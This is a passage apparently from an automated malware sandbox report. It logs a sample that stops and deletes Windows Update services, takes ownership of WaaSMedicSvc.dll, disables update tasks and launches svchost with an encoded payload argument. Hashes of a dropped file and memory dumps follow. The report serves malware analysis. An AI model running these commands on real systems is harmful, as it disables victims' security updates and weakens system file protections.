"\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\system32\sc.exesc stop bits4⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "ayfzchqlcjzzno"4⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe hhmzomdryxklm1 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRSWr9mZW0WjQ8Zp6uvmLE6u5mJa6blLxbhLUBAH2hxKbhKEsyAtsV/R69zSzs3rP9kwrKtV5rbpmU/ciKPfPbhE9OKMMZXsI4UuRWZka8gS1s3HImYphWDV4wtqbeoHFj9g+eZNUoxfSBEn9L8w689dicSe5gi9g1CuCFLqyc7rwP/qjv/3JltIuH5LITKSCk7NXUnWeSDcKY+NEgVfPhJqoLEg0aeDg0KzxJrSUBDIJsbJWIc9iXONDbVMTVT325hS49GeGAI3OCMHKRR3rdOlsV6M9LUsKiFtUKe023Fiqki/2NFI17HEJ11UF+t6f3f98YUZokpWGVfv/F+VZIliwJaLVyzmm8cmJbvj/Kk9fw4aMKco/zTvKVFpN7WHBE5ihOAIdgLEtFFOECZ0VkdHbSg7zj8LXWP3XBDgZmT/PqsiIA0H3OwZNBjcY4rgjXQuml3y2wHeGb80pVVWBuMCIL8sCKDGpDbxiGDcBPcXfVWLdW+mS2VMIb3O/HlHhTYbdCuIHWH/bwUTs0vfQ83nR1mapBl3HhjShQnY40eZw0N1hMUMfCNjyNzWVgfBMhy9MwGaqnFJcQDpiYiVz61SrdLFCtpEnS3/kpJJXUzUBm0N2+JFiygLQGxw1SnSpP2EyTmdeaAN2uFWIS+BKCPJnp+Urs4ZIl3L86i6Tua4xkWIuaHTvQcBBqfq2BUHq/tLhHwx6yCrF/kfnl/5iXfLuCspUzlw6ZMz1cm2MDpBcOg1/gqzqrt+nyVDaTWBNnlqQtGRUYtUgvt5UXluuo835dbfAbWdkMMKIb7n2tZu2O5jsprX3nRnflrXNwa4aGTIlireC/ZpMF870p7vGDEFpva1T0Rd09ATLL1v8gEbuv8MViLO6cBi+L9jUR0yZfcdT7y8lHnRy/+8C79u/c9DjZfyQB8NJv62KZdxCwBzSeLR5MMSp11Y2skr66+YEXG2FRRWrXAlH2bZXv98TaPSbt0i43nk4Yz7s+ytCPFUNIeIoxV9ce2xdOpHqqFCtwT8eJ9EaMxFCuVWhNc9ECcQ2wJtJ2BTuhX2x4mJKeaQTai1sy8DVQYd52treWJZeQG+84IKsCqBOo4TZLL7GKMsSj+J3fMBL82oHYCVo/XwBH9fjo36EWBjibeA1qOBj3n8/hOcGirQ/WjUG5965/cSYWzjatv0njtxER7lnH9HMnXMsHXUpgPeDkQYQe8tWGkKJfOjKWvOKULJTdqwcjKrySMCAnwM23+lrIvjgkHDSFXzrE4bsgtfQQLgMvxtEV0uEXKS5q7oSkWyt2f8078oXmh5OhNyLJn6XCoGx/NQGZ8UxzjcKczeCotM0TNeWj+SABRXgkf1VUKrXmJ0CAlPIjguo+q4co87MqHySF8+C6J7s6n/f1l++/reoGTPOhnw7iNjxqQsdhFqi8WdxxhNztJR1CeWprsRqngRs4eZ0B2KyfMQDOnyRkBthFTsKUv8+JSQD5ORke/9r2kNBdlHH3NamvS16q1YsdXFYsvFCMrBnbCTsCu+tasasTw82VpHrmPvBHdUFcaccuCCLHfZL28RuT4oBeO3lR+nHIbW9b5laMXY0Dn9kqMFd7Vj66+/jyFUG1pVWHJgudOaJbM3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Windows\services.exeFilesize
7.6MB
MD595104aa61ed30687c13e5c644d5722f3
SHA1f9788f808044d448f73203d93da0021cefb781ff
SHA256a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301
SHA51299dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce
-
C:\Program Files\Windows\services.exeFilesize
7.6MB
MD595104aa61ed30687c13e5c644d5722f3
SHA1f9788f808044d448f73203d93da0021cefb781ff
SHA256a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301
SHA51299dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logFilesize
539B
MD584f2160705ac9a032c002f966498ef74
SHA1e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
SHA2567840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
SHA512f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57
-
memory/588-233-0x000001FAE8510000-0x000001FAE852C000-memory.dmpFilesize
112KB
-
memory/588-239-0x000001FAE8710000-0x000001FAE87C9000-memory.dmpFilesize
740KB
-
memory/588-273-0x000001FAE8530000-0x000001FAE853A000-memory.dmpFilesize
40KB
-
memory/588-215-0x0000000000000000-mapping.dmp
-
memory/1560-369-0x0000000000000000-mapping.dmp
-
memory/1624-174-0x0000000000000000-mapping.dmp
-
memory/1776-184-0x0000000000000000-mapping.dmp
-
memory/2216-370-0x0000000000000000-mapping.dmp
-
memory/2536-130-0x0000000000000000-mapping.dmp
-
memory/2536-382-0x0000000000000000-mapping.dmp
-
memory/2644-171-0x0000000000000000-mapping.dmp
-
memory/3092-188-0x0000000000000000-mapping.dmp
-
memory/3092-413-0x0000028F4D640000-0x0000028F4D646000-memory.dmpFilesize
24KB
-
memory/3092-416-0x0000028F4CF10000-0x0000028F4CF17000-memory.dmpFilesize
28KB
-
memory/3140-197-0x0000000000000000-mapping.dmp
-
memory/3164-202-0x0000000000400000-0x0000000001119000-memory.dmpFilesize
13.1MB
-
memory/3364-189-0x0000000000000000-mapping.dmp
-
memory/3544-392-0x0000000000000000-mapping.dmp
-
memory/3624-181-0x0000000000000000-mapping.dmp
-
memory/3688-393-0x0000000000000000-mapping.dmp
-
memory/3808-191-0x0000000000000000-mapping.dmp
-
memory/3820-397-0x0000000000000000-mapping.dmp
-
memory/3844-199-0x0000000000000000-mapping.dmp
-
memory/3896-388-0x0000000000000000-mapping.dmp
-
memory/3908-389-0x0000000000000000-mapping.dmp
-
memory/3960-117-0x0000000000400000-0x0000000001119000-memory.dmpFilesize
13.1MB
-
memory/4052-391-0x0000000000000000-mapping.dmp
-
memory/4064-186-0x0000000000000000-mapping.dmp
-
memory/4068-178-0x0000000000000000-mapping.dmp
-
memory/4112-172-0x0000000000000000-mapping.dmp
-
memory/4140-177-0x0000000000000000-mapping.dmp
-
memory/4184-173-0x0000000000000000-mapping.dmp
-
memory/4188-383-0x0000000000000000-mapping.dmp
-
memory/4200-179-0x0000000000000000-mapping.dmp
-
memory/4220-366-0x0000000000000000-mapping.dmp
-
memory/4228-384-0x0000000000000000-mapping.dmp
-
memory/4240-367-0x0000000000000000-mapping.dmp
-
memory/4256-368-0x0000000000000000-mapping.dmp
-
memory/4264-375-0x0000000000000000-mapping.dmp
-
memory/4268-196-0x0000000000000000-mapping.dmp
-
memory/4300-214-0x0000000000000000-mapping.dmp
-
memory/4428-374-0x00000255EB6C0000-0x00000255EB6C6000-memory.dmpFilesize
24KB
-
memory/4428-385-0x00000255EBA50000-0x00000255EBA62000-memory.dmpFilesize
72KB
-
memory/4452-190-0x0000000000000000-mapping.dmp
-
memory/4472-376-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/4472-381-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/4472-377-0x0000000000401BEA-mapping.dmp
-
memory/4580-194-0x0000000000000000-mapping.dmp
-
memory/4652-146-0x000001D4F9ED0000-0x000001D4FA2EC000-memory.dmpFilesize
4.1MB
-
memory/4652-123-0x000001D4FCF00000-0x000001D4FD31C000-memory.dmpFilesize
4.1MB
-
memory/4692-131-0x0000000000000000-mapping.dmp
-
memory/4692-142-0x000002647B570000-0x000002647B5E6000-memory.dmpFilesize
472KB
-
memory/4692-137-0x0000026478F40000-0x0000026478F62000-memory.dmpFilesize
136KB
-
memory/4724-185-0x0000000000000000-mapping.dmp
-
memory/4728-180-0x0000000000000000-mapping.dmp
-
memory/4744-401-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/4744-402-0x00000230FEF50000-0x00000230FEF70000-memory.dmpFilesize
128KB
-
memory/4744-407-0x00000230FEFB0000-0x00000230FEFF0000-memory.dmpFilesize
256KB
-
memory/4744-399-0x000000014036DB84-mapping.dmp
-
memory/4744-404-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/4744-400-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/4744-417-0x00000230FF680000-0x00000230FF6A0000-memory.dmpFilesize
128KB
-
memory/4744-398-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/4772-371-0x0000000000000000-mapping.dmp
-
memory/4792-372-0x0000000000000000-mapping.dmp
-
memory/4796-175-0x0000000000000000-mapping.dmp
-
memory/4800-176-0x0000000000000000-mapping.dmp
-
memory/4804-394-0x0000000000000000-mapping.dmp
-
memory/4808-387-0x0000000000000000-mapping.dmp
-
memory/4820-390-0x0000000000000000-mapping.dmp
-
memory/4832-195-0x0000000000000000-mapping.dmp
-
memory/4848-187-0x0000000000000000-mapping.dmp
-
memory/4852-182-0x0000000000000000-mapping.dmp
-
memory/4856-395-0x0000000000000000-mapping.dmp
-
memory/4860-193-0x0000000000000000-mapping.dmp
-
memory/4900-396-0x0000000000000000-mapping.dmp
-
memory/4988-192-0x0000000000000000-mapping.dmp
-
memory/5016-183-0x0000000000000000-mapping.dmp
-
memory/5072-365-0x0000000000000000-mapping.dmp
-
memory/5084-373-0x0000000000000000-mapping.dmp